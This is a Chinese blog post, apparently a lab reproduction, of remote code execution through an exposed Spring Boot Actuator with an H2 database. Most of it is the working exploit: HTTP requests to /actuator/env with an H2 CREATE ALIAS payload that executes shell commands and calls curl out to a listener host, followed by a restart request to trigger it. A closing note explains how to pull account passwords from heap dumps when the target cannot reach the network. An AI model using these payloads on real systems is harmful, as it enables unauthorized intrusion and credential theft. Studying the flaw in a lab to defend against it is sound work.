Spring Boot Actuator H2 RCE复现

作者: print("") 分类: 未分类 发布时间: 2020-05-23 17:14

原文:https://www.cnblogs.com/cwkiller/p/12829974.html

参考:https://github.com/LandGrey/SpringBootVulExploit/blob/master/README.md

前端时间碰到一个Actuator  信息泄露的然后复现了一下这个漏洞

git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git

(2) 使用docker启动环境

先cd进入spring-boot-actuator-h2-rce目录然后执行以下命令

docker build -t spaceraccoon/spring-boot-rce-lab .
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab 

(3) 访问:http://39.105.93.185:8080/actuator

0x02 漏洞复现

(1)发送如下POST包配置spring.datasource.hikari.connection-test-query的值

POST /actuator/env HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 389

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl 39.105.93.185:8081');"}

(2)查看/actuator/env

(3)向端点 /actuator/restart 发送POST请求,重启应用

POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356

{}

(4) 查看nc 

 

PS : 有些机器不出网的时候可以利用dump 获取信息 然后使用软件导出账号密码如下:

软件地址:https://www.o2oxy.cn/wp-content/uploads/2020/05/MemoryAnalyzer.zip

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

说点什么

avatar
  Subscribe  
提醒